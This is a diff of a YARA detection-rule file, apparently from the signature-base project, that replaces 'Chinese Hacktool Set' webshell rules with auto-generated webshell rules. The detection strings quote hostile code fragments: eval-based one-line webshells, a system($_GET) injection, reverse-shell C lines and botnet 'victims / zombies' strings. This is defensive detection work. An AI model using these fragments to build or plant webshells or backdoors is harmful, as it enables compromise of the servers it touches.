-		logic_hash = "623e235ff3eb0922fe8aee732144a15bcc0c580229654ae988353176f488b085"
-		score = 75
+		hash = "1b9e518aaa62b15079ff6edb412b21e9"
+		logic_hash = "bf260ce0f8d4728920679573cd77927b44db28ba6102923707af8d1ad7d0ef2d"
+		score = 50
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "$sURL = \"301:http://\".$sServer.\"/index.asp\";" fullword ascii
-		$s2 = "(gov)\\\\.(cn)$/i\", $aURL[\"host\"])" ascii
-		$s3 = "$aArg = explode(\" \", $sContent, 5);" fullword ascii
-		$s4 = "$sURL = $aArg[0];" fullword ascii
+		$s4 = "\\Debug\\dllTest.pdb"
+		$s5 = "--list the services in the computer"
 
 	condition:
-		filesize < 3KB and 3 of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Tools_Item : FILE
+rule SIGNATURE_BASE_Connector
 {
 	meta:
-		description = "Chinese Hacktool Set - file item.php"
+		description = "Webshells Auto-generated - file connector.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "954f24c9-d7d5-56d3-86f0-0cf8832640dd"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L275-L291"
+		id = "e46026bc-c570-5057-a132-5a459c959a69"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8603-L8615"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a584db17ad93f88e56fd14090fae388558be08e4"
-		logic_hash = "1e927fd093aa11ad525f3f64d657f314520669b4237eac8f87d0be53cd848044"
+		hash = "3ba1827fca7be37c8296cd60be9dc884"
+		logic_hash = "b8cadb7aa23a8cdef10e7b1eb05586d6c3e7c398958a80861b6f1ccd4edf1eca"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "$sURL = \"http://\".$sServer.\"/\".$sWget;" fullword ascii
-		$s2 = "$sURL = \"301:http://\".$sServer.\"/\".$sWget;" fullword ascii
-		$s3 = "$sWget=\"index.asp\";" fullword ascii
-		$s4 = "$aURL += array(\"scheme\" => \"\", \"host\" => \"\", \"path\" => \"\");" fullword ascii
+		$s2 = "If ( AttackID = BROADCAST_ATTACK )"
+		$s4 = "Add UNIQUE ID for victims / zombies"
 
 	condition:
-		filesize < 4KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_F3_Diy : FILE
+rule SIGNATURE_BASE_Shelltools_G0T_Root_Hiderun
 {
 	meta:
-		description = "Chinese Hacktool Set - file diy.asp"
+		description = "Webshells Auto-generated - file HideRun.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9f36c6dd-89e8-511b-a499-131f1e8a420a"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L293-L307"
+		id = "dd71dbef-5b5d-5976-8b95-0f202a4b4795"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8616-L8628"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f39c2f64abe5e86d8d36dbb7b1921c7eab63bec9"
-		logic_hash = "37d6bc61d790ff30c98ded08ff875431fda525cd3ac10b4b1ba3f8f42167ed8c"
+		hash = "45436d9bfd8ff94b71eeaeb280025afe"
+		logic_hash = "3a6dea2314800b28e92b59595c8b79c64e66dc66ebfa8f89c2f4028b574b9a91"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<%@LANGUAGE=\"VBScript.Encode\" CODEPAGE=\"936\"%>" fullword ascii
-		$s5 = ".black {" fullword ascii
+		$s0 = "Usage -- hiderun [AppName]"
+		$s7 = "PVAX SW, Alexey A. Popoff, Moscow, 1997."
 
 	condition:
-		uint16( 0 ) == 0x253c and filesize < 10KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Chinachopper_Temp : FILE
+rule SIGNATURE_BASE_PHP_Shell_V1_7
 {
 	meta:
-		description = "Chinese Hacktool Set - file temp.asp"
+		description = "Webshells Auto-generated - file PHP_Shell_v1.7.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f163787f-fcc9-568a-a12d-4057cb4f0d29"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L309-L325"
+		id = "7eb69ac3-90bb-5a44-8dcd-e71f5edcf18f"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8629-L8640"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b0561ea52331c794977d69704345717b4eb0a2a7"
-		logic_hash = "3669dfa10867970456f6638035a87d448e2b728387fbd07b59ffd981a1ab6200"
+		hash = "b5978501c7112584532b4ca6fb77cba5"
+		logic_hash = "e03904177309de9ce1afa0b12bf70913b106650c3db5807f9d4ccb91fb2ade77"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "o.run \"ff\",Server,Response,Request,Application,Session,Error" fullword ascii
-		$s1 = "Set o = Server.CreateObject(\"ScriptControl\")" fullword ascii
-		$s2 = "o.language = \"vbscript\"" fullword ascii
-		$s3 = "o.addcode(Request(\"SC\"))" fullword ascii
+		$s8 = "<title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]"
 
 	condition:
-		filesize < 1KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Tools_2015 : FILE
+rule SIGNATURE_BASE_Xssshell_Save
 {
 	meta:
-		description = "Chinese Hacktool Set - file 2015.jsp"
+		description = "Webshells Auto-generated - file save.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "eb2826ab-ef8d-5a93-9ede-f5bbd7ab4ff4"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L327-L344"
+		id = "f33c7559-e2f7-5223-a0e9-4e1d3bc7f080"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8641-L8653"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8fc67359567b78cadf5d5c91a623de1c1d2ab689"
-		logic_hash = "2b93ef42c277fd8415cf89bf1bef3e841c56a2b4aa1507d99b84cd8adc9a0644"
+		hash = "865da1b3974e940936fe38e8e1964980"
+		logic_hash = "c53034c6ebc4f01c4573e688f548e71dae944913797b12eb8f22a5ef0a368ccf"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Configbis = new BufferedInputStream(httpUrl.getInputStream());" fullword ascii
-		$s4 = "System.out.println(Oute.toString());" fullword ascii
-		$s5 = "String ConfigFile = Outpath + \"/\" + request.getParameter(\"ConFile\");" fullword ascii
-		$s8 = "HttpURLConnection httpUrl = null;" fullword ascii
-		$s19 = "Configbos = new BufferedOutputStream(new FileOutputStream(Outf));;" fullword ascii
+		$s4 = "RawCommand = Command & COMMAND_SEPERATOR & Param & COMMAND_SEPERATOR & AttackID"
+		$s5 = "VictimID = fm_NStr(Victims(i))"
 
 	condition:
-		filesize < 7KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Chinachopper_Temp_2 : FILE
+rule SIGNATURE_BASE_Screencap
 {
 	meta:
-		description = "Chinese Hacktool Set - file temp.php"
+		description = "Webshells Auto-generated - file screencap.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3952ed2b-fb27-5c45-9cd7-b7a300b37c0e"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L346-L359"
+		id = "0c1b71d3-ad54-5230-b1ab-971647e76139"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8654-L8667"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "604a4c07161ce1cd54aed5566e5720161b59deee"
-		logic_hash = "1b6d840797afcdbf7c72836557dbd486780c760471e79133810346c301cca80b"
+		hash = "51139091dea7a9418a50f2712ea72aa6"
+		logic_hash = "9be7ec97ef8e9b8838f7931a8fcf8d85b1543a202a7bf34fab9791fc47889cb9"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "@eval($_POST[strtoupper(md5(gmdate(" ascii
+		$s0 = "GetDIBColorTable"
+		$s1 = "Screen.bmp"
+		$s2 = "CreateDCA"
 
 	condition:
-		filesize < 150 and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Templatr : FILE
+rule SIGNATURE_BASE_FSO_S_Phpinj_2
 {
 	meta:
-		description = "Chinese Hacktool Set - file templatr.php"
+		description = "Webshells Auto-generated - file phpinj.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b361a49d-1e05-5597-bf8b-735e04397ffa"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L361-L374"
+		id = "db8f835e-eb13-50f3-a60b-7d8ffcaa5eaa"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8668-L8679"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "759df470103d36a12c7d8cf4883b0c58fe98156b"
-		logic_hash = "80d207ee47c0c602ddd281e0e187b83cdb4f1385f4b46ad2a4f5630b8f9e96a1"
+		hash = "dd39d17e9baca0363cc1c3664e608929"
+		logic_hash = "12af5182b94f01ac4fbdee92c007556aaa7f196aca116575803cedd84b81f3b0"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "eval(gzinflate(base64_decode('" ascii
+		$s9 = "<? system(\\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 INTO"
 
 	condition:
-		filesize < 70KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Reduhservers_Reduh_3 : FILE
+rule SIGNATURE_BASE_Zxshell2_0_Rar_Folder_Zxrecv
 {
 	meta:
-		description = "Chinese Hacktool Set - file reDuh.aspx"
+		description = "Webshells Auto-generated - file zxrecv.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "69f5fd6b-a9b3-500b-8723-d1c82494903d"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L376-L392"
+		id = "9d36541f-dd55-5385-8e2b-598ad78bdf73"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8680-L8697"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0744f64c24bf4c0bef54651f7c88a63e452b3b2d"
-		logic_hash = "5a3bc023e0e8a5ccc8ee8e1b5e7ee0fca64e3f92b72d0aad15b25c82a23da487"
+		hash = "5d3d12a39f41d51341ef4cb7ce69d30f"
+		logic_hash = "7eef63e45f6902e4f2d5f854b2794df3101a2ef145e2d627263db429c2b728d7"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Response.Write(\"[Error]Unable to connect to reDuh.jsp main process on port \" +" ascii
-		$s2 = "host = System.Net.Dns.Resolve(\"127.0.0.1\");" fullword ascii
-		$s3 = "rw.WriteLine(\"[newData]\" + targetHost + \":\" + targetPort + \":\" + socketNum" ascii
-		$s4 = "Response.Write(\"Error: Bad port or host or socketnumber for creating new socket" ascii
+		$s0 = "RyFlushBuff"
+		$s1 = "teToWideChar^FiYP"
+		$s2 = "mdesc+8F D"
+		$s3 = "\\von76std"
+		$s4 = "5pur+virtul"
+		$s5 = "- Kablto io"
+		$s6 = "ac#f{lowi8a"
 
 	condition:
-		filesize < 40KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Chinachopper_Temp_3 : FILE
+rule SIGNATURE_BASE_FSO_S_Ajan
 {
 	meta:
-		description = "Chinese Hacktool Set - file temp.aspx"
+		description = "Webshells Auto-generated - file ajan.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "573e7da6-f58f-5814-b3e8-a0db3ecfe558"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L394-L408"
+		id = "03bf98b9-c8c5-5b9f-b0cd-700c5ed58eac"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8698-L8709"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c5ecb8bc1d7f0e716b06107b5bd275008acaf7b7"
-		logic_hash = "6a0d7817607362f325957e30cace24d32635b7e0411e161588ee573118f91b6a"
+		hash = "22194f8c44524f80254e1b5aec67b03e"
+		logic_hash = "a7766caae5845ce43cff2212c25fea9a78979d10c79d8c40290b5c1471b101cd"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"" ascii
-		$s1 = "\"],\"unsafe\");%>" ascii
+		$s4 = "entrika.write \"BinaryStream.SaveToFile"
 
 	condition:
-		uint16( 0 ) == 0x253c and filesize < 150 and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Shell_Asp : FILE
+rule SIGNATURE_BASE_C99Shell
 {
 	meta:
-		description = "Chinese Hacktool Set Webshells - file Asp.html"
+		description = "Webshells Auto-generated - file c99shell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "52089205-8f36-5a0b-a1ae-67c91a253ad2"
-		date = "2015-06-14"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L410-L425"
+		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8710-L8721"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5e0bc914ac287aa1418f6554ddbe0ce25f2b5f20"
-		logic_hash = "47c5c242713446471d5da4d9245b99561c26ad7fa016059076a6f0acab542c3c"
+		hash = "90b86a9c63e2cd346fe07cea23fbfc56"
+		logic_hash = "a0fcc43a80ac4d059aea36da8b4b5a81c99a54f7c66c521697805ae890d66fe8"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Session.Contents.Remove(m & \"userPassword\")" fullword ascii
-		$s2 = "passWord = Encode(GetPost(\"password\"))" fullword ascii
-		$s3 = "function Command(cmd, str){" fullword ascii
+		$s0 = "<br />Input&nbsp;URL:&nbsp;&lt;input&nbsp;name=\\\"uploadurl\\\"&nbsp;type=\\\"text\\\"&"
 
 	condition:
-		filesize < 100KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Txt_Aspxtag : FILE
+rule SIGNATURE_BASE_Phpspy_2005_Full
 {
 	meta:
-		description = "Chinese Hacktool Set - Webshells - file aspxtag.txt"
+		description = "Webshells Auto-generated - file phpspy_2005_full.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e01a7235-5c69-5676-ac5d-c4e4632f31b2"
-		date = "2015-06-14"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L428-L443"
+		id = "41a0560a-b22e-5028-8ad1-710c5758cb1d"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8722-L8733"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "42cb272c02dbd49856816d903833d423d3759948"
-		logic_hash = "6ffeee18945cab96673e4b9efc143017d168be12b794fa26aa4a304f15ae8e13"
+		hash = "d1c69bb152645438440e6c903bac16b2"
+		logic_hash = "8561161726a49374a9bc3389fef593e5d68dc437552e06736a235412183bef45"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "String wGetUrl=Request.QueryString[" fullword ascii
-		$s2 = "sw.Write(wget);" fullword ascii
-		$s3 = "Response.Write(\"Hi,Man 2015\"); " fullword ascii
+		$s7 = "echo \"  <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco"
 
 	condition:
-		filesize < 2KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Txt_Php : FILE
+rule SIGNATURE_BASE_FSO_S_Zehir4_2
 {
 	meta:
-		description = "Chinese Hacktool Set - Webshells - file php.txt"
+		description = "Webshells Auto-generated - file zehir4.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "65d5c46f-006d-58f9-bb7f-0a2e1f1853bd"
-		date = "2015-06-14"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L445-L461"
+		id = "7de89d22-0230-508a-ac50-f61730ad9f4e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8734-L8745"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "eaa1af4b898f44fc954b485d33ce1d92790858d0"
-		logic_hash = "ace26e7c0dca285febf6b9192cbe59cc7e55e80f2f4e1a99aba25afcbeadeec1"
+		hash = "5b496a61363d304532bcf52ee21f5d55"
+		logic_hash = "bb10f2e28bb375366b9140c06bb242cd13fdb69e67ce72ecae0e50270566f116"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "$Config=$_SERVER['QUERY_STRING'];" fullword ascii
-		$s2 = "gzuncompress($_SESSION['api']),null);" ascii
-		$s3 = "sprintf('%s?%s',pack(\"H*\"," ascii
-		$s4 = "if(empty($_SESSION['api']))" fullword ascii
+		$s4 = "\"Program Files\\Serv-u\\Serv"
 
 	condition:
-		filesize < 1KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Txt_Aspx1 : FILE
+rule SIGNATURE_BASE_FSO_S_Indexer_2
 {
 	meta:
-		description = "Chinese Hacktool Set - Webshells - file aspx1.txt"
+		description = "Webshells Auto-generated - file indexer.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e01a7235-5c69-5676-ac5d-c4e4632f31b2"
-		date = "2015-06-14"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L463-L477"
+		id = "8ef79a60-fa8c-51ee-bd87-f5467a66099b"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8746-L8757"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c5ecb8bc1d7f0e716b06107b5bd275008acaf7b7"
-		logic_hash = "20bdadd6c8b61ab14f6280f55a90f541bf65c33675f979ebe489cc3967438e15"
+		hash = "135fc50f85228691b401848caef3be9e"
+		logic_hash = "8cf4c8fb1e985adbed2cf20578fcfc14240f6d9fe6062bbe3fe2f895f58bc172"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<%@ Page Language=\"Jscript\"%><%eval(Request.Item["
-		$s1 = "],\"unsafe\");%>" fullword ascii
+		$s5 = "<td>Nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>"
 
 	condition:
-		filesize < 150 and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Txt_Shell : FILE
+rule SIGNATURE_BASE_Hytop_Devpack_2005
 {
 	meta:
-		description = "Chinese Hacktool Set - Webshells - file shell.c"
+		description = "Webshells Auto-generated - file 2005.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3e4c5928-346e-541b-b1a8-b37d5e3abc98"
-		date = "2015-06-14"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L479-L496"
+		id = "963effd9-f31d-5238-9419-b5dd11822e56"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8758-L8771"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8342b634636ef8b3235db0600a63cc0ce1c06b62"
-		logic_hash = "020e9e6ef776a9d69939fa3dec771dc516b0184086738bab439063acca89bd76"
+		hash = "63d9fd24fa4d22a41fc5522fc7050f9f"
+		logic_hash = "b312cddff4c5292cc51acc39448c815fede3c9356d7d225c3a08c7124712b3f8"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "printf(\"Could not connect to remote shell!\\n\");" fullword ascii
-		$s2 = "printf(\"Usage: %s <reflect ip> <port>\\n\", prog);" fullword ascii
-		$s3 = "execl(shell,\"/bin/sh\",(char *)0);" fullword ascii
-		$s4 = "char shell[]=\"/bin/sh\";" fullword ascii
-		$s5 = "connect back door\\n\\n\");" fullword ascii
+		$s7 = "theHref=encodeForUrl(mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\")"
+		$s8 = "scrollbar-darkshadow-color:#9C9CD3;"
+		$s9 = "scrollbar-face-color:#E4E4F3;"
 
 	condition:
-		filesize < 2KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Txt_Asp : FILE
+rule SIGNATURE_BASE__Root_040_Zip_Folder_Deploy
 {
 	meta:
-		description = "Chinese Hacktool Set - Webshells - file asp.txt"
+		description = "Webshells Auto-generated - file deploy.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "39a2ba9a-c429-574f-8820-5e0270a4b84c"
-		date = "2015-06-14"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L498-L512"
+		id = "7e592ab2-8a53-59d5-a45d-971398586479"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8772-L8785"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a63549f749f4d9d0861825764e042e299e06a705"
-		logic_hash = "9eab239310fbebe8c88cbf8d0ee4123b8f3e2ebe601949e1e984e9cfde9869e7"
+		hash = "2c9f9c58999256c73a5ebdb10a9be269"
+		logic_hash = "9852b105e6a28f5500fc6739b196dd14b9b0b69b1077be4063735380b0699abb"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Server.ScriptTimeout=999999999:Response.Buffer=true:On Error Resume Next:BodyCol" ascii
-		$s2 = "<%@ LANGUAGE = VBScript.Encode %><%" fullword ascii
+		$s5 = "halon synscan 127.0.0.1 1-65536"
+		$s8 = "Obviously you replace the ip address with that of the target."
 
 	condition:
-		uint16( 0 ) == 0x253c and filesize < 100KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Txt_Asp1 : FILE
+rule SIGNATURE_BASE_By063Cli
 {
 	meta:
-		description = "Chinese Hacktool Set - Webshells - file asp1.txt"
+		description = "Webshells Auto-generated - file by063cli.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b00ab02c-c767-568c-be99-6cc731c3f1dc"
-		date = "2015-06-14"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L514-L530"
+		id = "9b4a4842-e084-53e8-90fb-603ba034b7df"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8786-L8798"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "95934d05f0884e09911ea9905c74690ace1ef653"
-		logic_hash = "77a4409b852d24228b0e1701f1ccc2abe3930c2c7240a43796b23042e706d9bf"
+		hash = "49ce26eb97fd13b6d92a5e5d169db859"
+		logic_hash = "c89159b73232bc8fd7430b3330009f4b3eb25b9511515bc9b4cd433f7a67f30e"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "if ShellPath=\"\" Then ShellPath = \"cmd.exe\"" fullword ascii
